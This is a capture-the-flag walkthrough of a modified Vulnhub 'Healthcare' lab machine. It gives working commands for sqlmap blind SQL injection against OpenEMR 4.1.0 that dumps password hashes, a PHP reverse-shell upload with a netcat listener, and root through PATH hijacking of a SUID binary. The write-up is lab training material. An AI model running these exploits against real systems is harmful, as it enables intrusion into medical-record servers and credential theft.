Machine Info
This is a modified version of Healthcare on Vulnhub.
Machine IP: 10.0.2.19
Attacking IP: 10.0.2.14
Enumeration
1
2
3
4
5
6
7
8
$ nmap 10.0.2.19 -sV -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 06:54 EST
Nmap scan report for 10.0.2.19
Host is up (0.00056s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3d
80/tcp open http Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
1
2
3
4
5
6
7
$ gobuster dir \
-w directory-list-2.3-big.txt \
-x php,html,js,txt \
-t 30 \
--url http://10.0.2.19
/openemr
OpenEMR 4.1.0 login page
Blind SQL Injection
OpenEMR is a open-source software for medical things or something, idk, all I know is OpenEMR 4.1.0 has an unauthenticated SQL Injection vulnerability right here on this login form, codenamed CVE-2012-2115 . When we press login, first it will send data to validateuser.php
to determine if the user exists. If the user exists, meaning whatever query is running in the backend returns at least one row, the page will return 1. We can inject our SQL here and do a blind SQL attack.
Doing a blind SQL attack manually is boring, I’ll update this article later with the way of the blind, but for now let’s use sqlmap to dump the content of the user table
1
$ sqlmap -u 'http://10.0.2.19/openemr/interface/login/validateUser.php?u=asmin' -D openemr -T users -C username,password --dump
username | password |
---|---|
admin | 2de89a0a37f4a62dc4fa04f2637efcbba098ab44 |
medical | ab24aed5a7c4ad45615cd7e0da816eea39e4895d |
We have the password hashes, CrackStation returned the second hash, and we have the credentials for the user medical
:medical
.
Remote Code Execution
Once we got inside, we have another CVE to exploit, CVE-2011-5161. This CVE is a fairly simple improper handling of files uploaded by the user. Basically we can upload a file with any name we want, because the software allow us to rename the file.
Navigate to Patient/Client -> New/Search -> Create a new user.
After creating the new user, navigate to Documents -> Patient Photograph.
Here you will see an upload form, we can create a php reverse shell then rename the file to .jpg, then when uploading it, specify the name to be .php again.
After that just have netcat listen on the port of your choice then browse to the web shell.
1
2
3
4
5
6
$ nc -klnvp 1313
listening on [any] 1313 ...
connect to [10.0.2.14] from (UNKNOWN) [10.0.2.19] 49017
sh-4.1$ whoami
apache
Now we escalate.
Do a routine search, for this machine, scanning for SUID binaries caught this one strange looking binary:
1
2
3
4
5
6
7
sh-4.1$ find / -perm -u=s 2>/dev/null
...
/usr/bin/healthcheck
...
sh-4.1$ ls /usr/bin/healthcheck -al
-rwsr-sr-x 1 root root 5813 Jul 29 10:04 /usr/bin/healthcheck
I can’t find information about this binary online, so it must be unique crafted for this machine. We can run this file as root, but all it does is checking the health of the disk and file system and list all the files on the disk.
We can try to decompile the code, but I didn’t find anything interesting. cat
-ting the files, on the other hand, is super useful this time;
1
2
3
4
5
sh-4.1$ cat /usr/bin/healthcheck
ELF 4T
...truncated
[��clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h��������
...truncated
Basically this binary is just calling shell commands.
1
2
3
4
5
6
7
8
clear ;
echo 'System Health Check' ;
echo '' ;
echo 'Scanning System' ;
sleep 2 ;
ifconfig ;
fdisk -l ;
du -h
And they did not specify the absolute path to the files. So we can do a bit of PATH manipulation here and add .
(dot) to it, then create our own executable files with the same name as the commands used in the healthcheck
binary.
1
2
3
4
sh-4.1$ export PATH=.:$PATH
sh-4.1$ echo $PATH
.:/sbin:/usr/sbin:/bin:/usr/bin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sh-4.1$ cd /tmp
sh-4.1$ echo $'#!/bin/sh\n/bin/sh' > clear
sh-4.1$ cat clear
#!/bin/sh
/bin/sh
sh-4.1$ healthcheck
$ whoami
root
$ cat healthcheck.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h");
}
In the above code I have created a shell script named clear
that spawn a shell. This coupled with the fact that there is a .
at the beginning my PATH
means that when I call clear
without the path to the binary the shell script I created will be executed instead of any other binaries named clear
in any other PATH
directory. This tripled with the fact that the healthcheck
binary does not specify the path to the shell commands it uses means that the shell will look for the actual binaries in the directories in PATH
.
All of this combined created a perfect storm for me to climb to the top of the system and obtain root.